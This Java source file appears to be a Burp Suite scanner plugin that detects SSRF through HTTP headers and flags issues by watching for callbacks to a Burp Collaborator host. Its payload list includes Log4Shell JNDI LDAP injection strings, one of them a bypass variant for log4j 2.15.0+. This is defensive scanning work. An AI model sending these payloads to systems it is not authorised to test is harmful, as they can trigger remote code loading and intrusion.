package com.yandex.burp.extensions.plugins.audit;

import java.util.AbstractMap.SimpleEntry;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

import burp.IBurpCollaboratorClientContext;
import burp.IBurpCollaboratorInteraction;
import burp.IBurpExtenderCallbacks;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IRequestInfo;
import burp.IScanIssue;
import burp.IScannerInsertionPoint;
import com.yandex.burp.extensions.plugins.CustomScanIssue;
import com.yandex.burp.extensions.plugins.config.BurpMollyPackConfig;

import static burp.IScannerInsertionPoint.INS_HEADER;

/**
 * Created by aleksei-m on 08/10/2020.
 */
public class YaSSRFviaHeaderPlugin implements IAuditPlugin {

    private final int ISSUE_TYPE = 0x080a0007;
    private final String ISSUE_NAME = "Molly SSRF via Header Value";
    private final String SEVERITY = "High";
    private final String CONFIDENCE = "Certain";
    private static final String ISSUE_BACKGROUND = "Server-side request forgery (also known as SSRF) is a web " +
            "security vulnerability that allows an attacker to induce the server-side application to make HTTP requests " +
            "to an arbitrary domain of the attacker's choosing.\n\n" +
            "In typical SSRF examples, the attacker might cause the server to make a connection back to itself, " +
            "or to other web-based services within the organization's infrastructure, or to external third-party systems.";
    private static final String REMEDIATION_BACKGROUND = "https://wiki.yandex-team.ru/security/for/web-developers/ssrf/#zashhitnyemery";

    private static final List<SimpleEntry<String, String>> SSRFPayloads = new ArrayList<>();

    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;

    public YaSSRFviaHeaderPlugin(IBurpExtenderCallbacks callbacks, BurpMollyPackConfig extConfig) {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
        initSSRFPayloads();
    }

    @Override
    public List<IScanIssue> doScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {

        if (insertionPoint.getInsertionPointType() != INS_HEADER) return null;

        List<IScanIssue> issues = new ArrayList<>();

        IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext();
        IRequestInfo requestInfo = helpers.analyzeRequest(baseRequestResponse);

        for (SimpleEntry<String, String> ssrfPayload : SSRFPayloads) {
            String headerForSSRF = ssrfPayload.getKey();
            String headerTemplateValue = ssrfPayload.getValue();
            String payload = collaboratorContext.generatePayload(true);
            String httpPrefixedPayload = String.format(headerForSSRF + ": " + headerTemplateValue, payload);
            List<String> headers = requestInfo.getHeaders();
            headers.removeIf(header -> header != null && header.toLowerCase().startsWith(headerForSSRF.toLowerCase() + ":"));
            headers.add(httpPrefixedPayload);

            byte[] request = helpers.buildHttpMessage(headers, substring(baseRequestResponse.getRequest(), requestInfo.getBodyOffset()));
            IHttpRequestResponse scanCheckRequestResponse = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), request);

            List<IBurpCollaboratorInteraction> collaboratorInteractions = collaboratorContext.fetchCollaboratorInteractionsFor(payload);
            if (!collaboratorInteractions.isEmpty()) {
                IScanIssue issue = reportIssue(httpPrefixedPayload, scanCheckRequestResponse, collaboratorInteractions.get(0));
                issues.add(issue);
            }

        }
        return issues;
    }

    private byte[] substring(byte[] array, int from) {
        int len = array.length - from;
        byte[] subArray = new byte[len];
        System.arraycopy(array, from, subArray, 0, len);
        return subArray;
    }

    private IScanIssue reportIssue(String payload, IHttpRequestResponse sentRequestResponse, IBurpCollaboratorInteraction collaboratorInteraction) {
        IHttpRequestResponse[] httpMessages = new IHttpRequestResponse[]{callbacks.applyMarkers(sentRequestResponse,
                buildRequestHighlights(payload, sentRequestResponse),
                Collections.emptyList())};
        String issueDetail = "The application is vulnerable to SSRF attacks.<br><br>" +
                "The header <strong>" + payload + "</strong> was sent to the application.<br><br>" +
                "The application made " + eventDescription(collaboratorInteraction) + "<strong>" +
                collaboratorInteraction.getProperty("interaction_id") + "</strong>.<br><br>" +
                "The  " + interactionType(collaboratorInteraction.getProperty("type")) + " was received from the IP address " + collaboratorInteraction.getProperty("client_ip") +
                " at " + collaboratorInteraction.getProperty("time_stamp") + ".";
        return new CustomScanIssue(sentRequestResponse.getHttpService(),
                helpers.analyzeRequest(sentRequestResponse).getUrl(),
                httpMessages, issueDetail,
                ISSUE_TYPE, ISSUE_NAME, SEVERITY, CONFIDENCE, "",
                ISSUE_BACKGROUND, REMEDIATION_BACKGROUND);
    }

    private List<int[]> buildRequestHighlights(String payload, IHttpRequestResponse sentRequestResponse) {
        List<int[]> requestHighlights = new ArrayList<>();
        int startOfPayload = helpers.indexOf(sentRequestResponse.getRequest(),
                helpers.stringToBytes(payload), true, 0,
                sentRequestResponse.getRequest().length);
        if (startOfPayload != -1) {
            requestHighlights.add(new int[]{startOfPayload, startOfPayload + payload.length()});
        }
        return requestHighlights;
    }

    private String interactionType(String type) {
        if (type.equalsIgnoreCase("http")) {
            return "HTTP connection";
        } else if (type.equalsIgnoreCase("dns")) {
            return "DNS lookup";
        } else {
            return "interaction";
        }
    }

    private String eventDescription(IBurpCollaboratorInteraction event) {
        if (event.getProperty("type").equalsIgnoreCase("http")) {
            return "an <strong>HTTP</strong> request to the Collaborator server using the subdomain ";
        } else if (event.getProperty("type").equalsIgnoreCase("dns")) {
            return "a <strong>DNS</strong> lookup of type <strong>" + event.getProperty("query_type") + "</strong> to the Collaborator server subdomain ";
        } else {
            return "an unknown interaction with the Collaborator server using the subdomain ";
        }
    }

    public void initSSRFPayloads() {
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Host","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Server","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Host","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Referer","http://%s/ref"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Original-URL","http://%s/"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Proto","http://%s/"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Origin","http://%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Host","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Proxy-Host","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Destination","%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-For","spoofed.%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Contact","root@%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("From","root@%s"));
        SSRFPayloads.add(new SimpleEntry<String, String>("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@%s"));
        /* log4j temporary insertion points, need move to another plugin later  */
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Host","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Server","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Host","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Referer","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Original-URL","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Proto","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Origin","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Host","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Proxy-Host","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Destination","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-For","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Contact","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("From","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("User-Agent","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Req-Id","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Yandex-Req-Id","${jndi:ldap://%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Request-Id","${jndi:ldap://%s:1389/D}"));
        /* and for 2.15.0+ w/ Thread Context Map */
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Host","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Server","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Host","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Referer","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Original-URL","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-Proto","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Origin","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Host","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Proxy-Host","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Destination","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Forwarded-For","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("Contact","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("From","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("User-Agent","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Req-Id","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Yandex-Req-Id","${jndi:ldap://127.0.0.1#%s:1389/D}"));
        SSRFPayloads.add(new SimpleEntry<String, String>("X-Request-Id","${jndi:ldap://127.0.0.1#%s:1389/D}"));
    }

}
